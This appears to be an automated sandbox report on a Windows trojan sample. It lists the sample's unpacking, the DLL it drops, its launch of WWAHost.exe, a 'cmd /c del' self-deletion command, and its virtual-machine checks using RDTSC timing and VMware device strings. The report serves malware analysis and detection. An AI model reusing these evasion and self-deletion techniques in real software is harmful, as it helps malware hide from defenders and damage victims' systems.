          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005787AA NtAllocateVirtualMemory,
          Source: DN_467842234567.exe, 00000000.00000003.671874971.000000000EA76000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DN_467842234567.exe
          Source: DN_467842234567.exe, 00000001.00000002.734746634.0000000000B16000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs DN_467842234567.exe
          Source: DN_467842234567.exe, 00000001.00000002.735470838.0000000000C7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DN_467842234567.exe
          Source: DN_467842234567.exeReversingLabs: Detection: 64%
          Source: C:\Users\user\Desktop\DN_467842234567.exeFile read: C:\Users\user\Desktop\DN_467842234567.exeJump to behavior
          Source: DN_467842234567.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DN_467842234567.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Users\user\Desktop\DN_467842234567.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\DN_467842234567.exeFile created: C:\Users\user\AppData\Local\Temp\nslF1B.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@13/6
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\DN_467842234567.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: WWAHost.pdb source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DN_467842234567.exe, 00000000.00000003.669973012.000000000EAF0000.00000004.00000001.sdmp, DN_467842234567.exe, 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, WWAHost.exe, 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DN_467842234567.exe, WWAHost.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeUnpacked PE file: 1.2.DN_467842234567.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0040C845 push es; ret
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004172E9 push edx; retf
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418AE8 push ds; retf
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B7C5 push eax; ret
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0389D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0056C845 push es; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B87C push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B812 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B81B push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005772E9 push edx; retf
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578AE8 push ds; retf
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B7C5 push eax; ret
          Source: initial sampleStatic PE information: section name: .data entropy: 7.77743167322
          Source: C:\Users\user\Desktop\DN_467842234567.exeFile created: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DN_467842234567.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 00000000005685F4 second address: 00000000005685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 000000000056898E second address: 0000000000568994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5152Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 7076Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.718727163.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.715398988.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.718727163.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000004.00000000.692764145.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.700657795.000000000A897000.00000004.00000001.sdmpBinary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}WW
          Source: explorer.exe, 00000004.00000000.700657795.000000000A897000.00000004.00000001.sdmpBinary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_729156EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_729159AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_729158FE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_729159EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_72915A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C3D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C58B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
